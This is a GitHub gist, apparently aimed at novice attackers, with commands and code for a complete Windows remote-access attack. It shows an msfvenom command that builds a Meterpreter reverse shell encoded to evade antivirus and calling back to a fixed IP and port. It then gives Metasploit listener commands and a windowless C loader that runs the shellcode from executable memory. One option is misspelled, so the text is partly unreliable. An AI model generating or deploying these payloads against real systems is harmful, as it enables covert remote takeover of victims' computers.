Skip to content

Instantly share code, notes, and snippets.

@celeron633
Last active December 13, 2020 09:22
Show Gist options
  • Save celeron633/3854220a5e097717a7cf44afb74c0554 to your computer and use it in GitHub Desktop.
Save celeron633/3854220a5e097717a7cf44afb74c0554 to your computer and use it in GitHub Desktop.
powerful msfvenom payload generator for script kiddie
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.199.233 lport=2333 prependmigrate=true prepenmigrateprocess=explorer.exe -f c
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.233
set lport 2333
prependmigrate=true
prepenmigrateprocess=explorer.exe
exploit -z -j (后台执行)
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
main()
{
void *Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
prependmigrate=true
prepenmigrateprocess=explorer.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment